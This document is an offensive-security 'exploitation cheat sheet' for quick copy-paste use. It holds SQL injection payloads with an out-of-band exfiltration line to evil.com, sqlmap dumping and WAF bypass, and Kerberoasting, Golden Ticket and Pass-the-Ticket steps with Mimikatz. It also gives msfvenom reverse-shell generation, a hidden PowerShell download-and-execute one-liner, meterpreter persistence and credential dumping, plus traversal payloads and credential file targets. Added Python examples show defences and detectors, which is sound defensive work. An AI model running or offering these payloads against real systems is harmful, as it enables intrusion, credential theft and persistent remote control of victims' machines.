Exploitation Cheat Sheet

This page serves as a cheat sheet for quickly launching commands for identified vulnerabilities. Use it as a reference guide or for syntax help.

SQL Injection

Manual SQLi

Error-Based

# Generic
' OR '1'='1

# Comment terminators
'-- 
'#
'-- -

# Login Forms
admin'--
admin'-- -

Boolean-Based Blind

True: 
' AND '1'='1
False:
' AND '1'='2#

' AND 1=1--
' OR 1=1--
' OR 'a'='a
' OR 1=1; --

Time-Based Blind

' OR IF('1'='1', sleep(5), 0)--

UNION-Based

' UNION SELECT NULL, username, password FROM users-- 

Out-of-Band Exfiltration

' UNION SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users WHERE username='admin'), '.evil.com\\'))-- 
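
The payloads above all rely on the same defect: user input is spliced into the SQL text. The following is an added example (not part of the original cheat sheet) showing the vulnerable pattern next to its parameterised fix, plus a small indicator check built from the payload shapes listed above. The users table, its rows and the indicator patterns are constructed for the example; SQLite is used only because it runs in memory, the point is identical for MySQL, MSSQL and PostgreSQL drivers.

```python
import re
import sqlite3

# Constructed sample data: an in-memory SQLite users table standing in for a real backend.
def build_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    # Attacker-controlled text is spliced into the SQL grammar: a quote in the input closes
    # the literal and the remainder is parsed as SQL, so admin'-- and ' OR '1'='1 both work.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, username, password):
    # Bound parameters: values travel separately from the statement text, so quotes,
    # comment markers and OR clauses inside them are compared as data, never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

# Constructed indicator patterns derived from the manual payloads on this page.
# A hit is a triage signal for request-log review, not proof of exploitation.
SQLI_INDICATORS = [
    re.compile(r"'\s*(or|and)\s*'?\d+'?\s*=\s*'?\d+", re.IGNORECASE),  # ' OR '1'='1, ' AND 1=1
    re.compile(r"(--|#)\s*$|--\s"),                                      # comment terminators
    re.compile(r"union\s+(all\s+)?select", re.IGNORECASE),               # UNION-based
    re.compile(r"\b(sleep|benchmark|waitfor)\s*\(", re.IGNORECASE),     # time-based blind
    re.compile(r"load_file\s*\(", re.IGNORECASE),                        # out-of-band file read
]

def sqli_indicators(value):
    """Return the indices of SQLI_INDICATORS that match one request parameter value."""
    return [i for i, pat in enumerate(SQLI_INDICATORS) if pat.search(value)]

if __name__ == "__main__":
    db = build_sample_db()
    print(login_vulnerable(db, "admin'--", ""))         # login bypass: ['admin']
    print(login_vulnerable(db, "", "' OR '1'='1"))      # every row: ['admin', 'alice']
    print(login_safe(db, "admin'--", ""))               # []: the payload is just a string
    print(sqli_indicators("' UNION SELECT NULL, username, password FROM users-- "))
```

Running the module shows the same payload producing a bypass against login_vulnerable and an empty result against login_safe; the indicator list is deliberately narrow so that a name like O'Brien does not trip it.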

SQLMap Commands

Basic Scan

sqlmap -u "http://example.com/page.php?id=1" 

List Databases

sqlmap -u "http://example.com/page.php?id=1" --dbs 

Dump Tables

sqlmap -u "http://example.com/page.php?id=1" -D target_db --tables
sqlmap -u "http://example.com/page.php?id=1" -D target_db -T users --dump

Bypass WAF

sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment

Captured Request

sqlmap -r request.txt

Kerberoasting

Enumerate SPNs:

This is your first step. Identify potential service accounts:

# PowerView's way of listing SPNs
Import-Module .\PowerView.ps1
Get-NetUser | Where-Object { $_.serviceprincipalname }

Extract Service Tickets:

# Using Invoke-Kerberoast to get the tickets
Invoke-Kerberoast -OutputFormat Hashcat | Format-List

This will yield ticket hashes, ripe for cracking.

Cracking the Tickets:

Armed with the ticket hashes, it’s time to bring Hashcat into play:

# Hashcat at work on the Kerberos tickets
hashcat -m 13100 -a 0 ticket_hashes.txt path_to_wordlist/wordlist.txt

The -m 13100 specifies the hash type (Kerberos TGS-REP etype 23) while -a 0 denotes a straight attack mode. Should you have rules for mutating potential passwords, integrate them for more advanced cracking attempts.
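
The three steps above leave a footprint on the domain controller: every service ticket request is logged as Security event 4769, and a Kerberoast run shows as one account requesting tickets for many user service accounts with etype 0x17 (RC4, the etype hashcat mode 13100 cracks). The following is an added detection example, not part of the original cheat sheet. The event lines are constructed in a flat key=value rendering; real exports (EVTX, Winlogbeat, a SIEM) carry the same field names under a different serialisation, and the threshold of three distinct services is an assumption to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sample lines in a flat key=value rendering of Security event 4769
# (a Kerberos service ticket was requested). One user requests RC4 tickets for
# four service accounts in a row; the rest is normal AES traffic for comparison.
SAMPLE_4769 = """\
EventID=4769 AccountName=jdoe@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.50
EventID=4769 AccountName=jdoe@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.50
EventID=4769 AccountName=jdoe@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.50
EventID=4769 AccountName=jdoe@CORP.LOCAL ServiceName=svc_print TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.50
EventID=4769 AccountName=asmith@CORP.LOCAL ServiceName=FS01$ TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.71
EventID=4769 AccountName=asmith@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.71
EventID=4769 AccountName=svc_sql@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 TicketOptions=0x40810000 IpAddress=::ffff:10.10.10.20
EventID=4768 AccountName=jdoe@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 TicketOptions=0x40810010 IpAddress=::ffff:10.10.10.50
"""

KV = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn one key=value line into a dict (values contain no whitespace in this rendering)."""
    return dict(KV.findall(line))

def is_roast_candidate(ev):
    """A 4769 for a user service account (not a computer account, not krbtgt) using RC4."""
    if ev.get("EventID") != "4769":
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    # 0x17 = etype 23 (RC4-HMAC). An AES-only domain should see none of these; a mixed
    # domain has a low, stable baseline that the per-requester fan-out below rises above.
    return ev.get("TicketEncryptionType", "").lower() == "0x17"

def find_kerberoast_requesters(lines, min_services=3):
    """Requester -> sorted distinct RC4 service names, for requesters at or above the threshold."""
    per_account = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_roast_candidate(ev):
            per_account[ev["AccountName"]].add(ev["ServiceName"])
    return {acct: sorted(svcs) for acct, svcs in per_account.items() if len(svcs) >= min_services}

if __name__ == "__main__":
    for acct, services in find_kerberoast_requesters(SAMPLE_4769.splitlines()).items():
        print(acct, "requested RC4 tickets for", ", ".join(services))
```

The filter excludes computer accounts (names ending in $) and krbtgt because their keys are random and not crackable by wordlist, which is exactly why the attack targets user accounts with SPNs; the fan-out threshold separates the single legitimate RC4 request from svc_sql to itself from the burst by jdoe.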

Golden Ticket Attack

Extracting the krbtgt Hash:

With domain administrator privileges, the next move is to extract the krbtgt hash:

# Mimikatz command for fetching the krbtgt hash
lsadump::lsa /inject /name:krbtgt

Create the Ticket:

With the krbtgt hash in hand, it’s time to forge the Golden Ticket:

# Mimikatz command to generate a Golden Ticket
kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /krbtgt:krbtgt_hash_here /ticket:golden_ticket.tkt

Use the Ticket:

Once you’ve created the Golden Ticket, it needs to be loaded into your session:

# Mimikatz to load the Golden Ticket
kerberos::ptt golden_ticket.tkt

From here, you can access resources, execute commands, or perform other actions as if you were an authenticated domain user.

Pass the Ticket Attack

Inject the Ticket

With a ticket in hand (often a .kirbi file), it’s time to inject it into your session:

# Using Mimikatz to inject the ticket
kerberos::ptt ticket_name.kirbi

Access Resources:

After injection, you can access resources as the user associated with the ticket:

# Accessing a file share, for example
net use \\target_machine\share

Command Injection

# Chain Command
<input>; whoami

# &&
<input> && whoami

# ||
<input> || whoami

# Input redirection
<input> < /etc/passwd

# Command Substitution
<input> $(ls)
<input> `ls`

# Nesting Commands
<input>; echo $(ls)

# Inline Comments
<input>; whoami #

# Using Pipe
<input> | whoami
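
Every separator listed above only has an effect because the application hands a concatenated string to a shell. The following is an added example (not from the original cheat sheet) of a ping helper written both ways: the vulnerable string build, and the hardened form that validates the value against an allowlist and passes an argv list with no shell. The hostname rule, the ping use case and the run_ping wrapper are constructed for the example; shell_tokens uses the standard shlex module to show how a POSIX shell would carve the concatenated string.

```python
import re
import shlex
import subprocess

# Hypothetical allowlist for this example: a DNS name made of labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def is_valid_hostname(host):
    return bool(HOSTNAME_RE.match(host))

def build_command_vulnerable(host):
    # One string that a shell will parse: ; && || | < $() and backticks all keep their
    # shell meaning, so "example.com; whoami" runs ping and then whoami.
    return "ping -c 1 " + host

def build_command_safe(host):
    # 1. Validate against what the value is supposed to be, not against a blocklist of characters.
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname: %r" % host)
    # 2. Return an argv list: the host is a single argument delivered to ping itself, so a
    #    metacharacter that somehow passed validation is an inert string, not a command.
    return ["ping", "-c", "1", host]

def run_ping(host, runner=subprocess.run):
    """Run the hardened command; runner is injectable so the logic can be tested without pinging."""
    argv = build_command_safe(host)
    # shell=False is already the default for a list argv; spelled out because it is the point.
    return runner(argv, shell=False, capture_output=True, text=True, timeout=10)

def shell_tokens(command_string):
    """Show how a POSIX shell splits a string: separators such as ; become their own tokens."""
    lexer = shlex.shlex(command_string, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)

if __name__ == "__main__":
    tainted = "example.com; whoami"
    print(shell_tokens(build_command_vulnerable(tainted)))  # ';' and 'whoami' are separate tokens
    try:
        build_command_safe(tainted)
    except ValueError as exc:
        print("rejected:", exc)
    print(build_command_safe("example.com"))
```

If a shell is genuinely unavoidable (a pipeline the program must compose), shlex.quote() on each value is the fallback, but the argv list is the primary control because it removes the shell from the data path entirely.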

Meterpreter

Sessions

CTRL+Z   -> Session in Background
sessions -> List sessions
sessions -i session_number -> Interact with Session with id
sessions -u session_number -> Upgrade session to a meterpreter
sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false -> Upgrade session to a meterpreter

sessions -c cmd           -> Execute a command on several sessions
sessions -i 10-20 -c "id" -> Execute a command on several sessions

Background handler

ExitOnSession false: the handler keeps listening, so it does not exit if the meterpreter dies.

screen -dRR
sudo msfconsole

use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false

generate -o /tmp/meterpreter.exe -f exe
to_handler

[ctrl+a] + [d]

Generate a meterpreter

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl

Meterpreter Webdelivery

Set up a PowerShell web delivery listening on port 8080.

use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/x64/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 4444
run
powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');

Get System

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Persistence Startup

OPTIONS:

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -U -p 4242

Network Monitoring

# list interfaces
run packetrecorder -li

# record interface 1
run packetrecorder -i 1

Portforward

portfwd add -l 7777 -r 172.17.0.2 -p 3006

Upload / Download

upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim

Execute from Memory

execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w

Mimikatz

load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full
load kiwi
creds_all
golden_ticket_create -d <domainname> -k <nthash_of_krbtgt> -s <SID without the RID> -u <user_for_the_ticket> -t <location_to_store_tck>

Directory Traversal

Basic Form

# Basic
http://example.com/viewfile?file=../../../etc/passwd

# Encoded
http://vulnerable-site.com/view?file=%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

# Double Encoded
http://vulnerable-site.com/view?file=%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
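
The three forms above differ only in encoding, which is why a check that looks for the literal string ../ misses the second and third. The following is an added example (not from the original page) of a file-parameter check that decodes until the value is stable, normalises lexically, and verifies the result is still under the document root. The base directory /srv/app/files and the TraversalError class are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/srv/app/files"   # hypothetical document root for this example

class TraversalError(ValueError):
    pass

def fully_decode(value, max_rounds=3):
    """Undo URL encoding until the value stops changing, so %252E%252E and %2E%2E both become '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    # More layers than any legitimate client produces: treat as hostile rather than keep decoding.
    raise TraversalError("too many encoding layers")

def resolve_under_base(user_path, base=BASE_DIR):
    base = posixpath.normpath(base)
    candidate = fully_decode(user_path)
    if "\x00" in candidate:
        raise TraversalError("NUL byte in path")
    candidate = candidate.replace("\\", "/")        # a backslash is a separator on Windows targets
    if candidate.startswith("/"):
        raise TraversalError("absolute path rejected")
    # Lexical normalisation collapses every '..'; anything still under base after that is allowed.
    full = posixpath.normpath(posixpath.join(base, candidate))
    if full != base and not full.startswith(base + "/"):
        raise TraversalError("path escapes base: " + full)
    # On a live filesystem follow this with os.path.realpath() so a symlink inside base cannot
    # point outside it; that needs the directory to exist, so it is left out of this offline check.
    return full

def is_safe_path(user_path, base=BASE_DIR):
    try:
        resolve_under_base(user_path, base)
        return True
    except TraversalError:
        return False

if __name__ == "__main__":
    for p in ["reports/q1.txt", "../../../etc/passwd",
              "%2E%2E%2F%2E%2E%2Fetc%2Fpasswd", "%252E%252E%252F%252E%252E%252Fetc%252Fpasswd"]:
        print("%-50s %s" % (p, "allowed" if is_safe_path(p) else "rejected"))
```

The same check applied to the Windows paths listed below works unchanged because the backslash is mapped to a forward slash before normalisation; the realpath follow-up is what closes the symlink case that a purely lexical check cannot see.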

Always Check

# Linux
/home/<user>/.ssh/id_rsa
/etc/ssl/private/
/var/lib/mysql/
/etc/sudoers
/etc/passwd
/etc/shadow
/etc/ssh/
/var/log/
/var/www/

# Windows
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\inetsrv\config
C:\ProgramData\Microsoft\Crypto
C:\Windows\System32\LogFiles
C:\Windows\System32\config
C:\Windows\System32\inetsrv
C:\inetpub\wwwroot
C:\Inetpub
C:\Users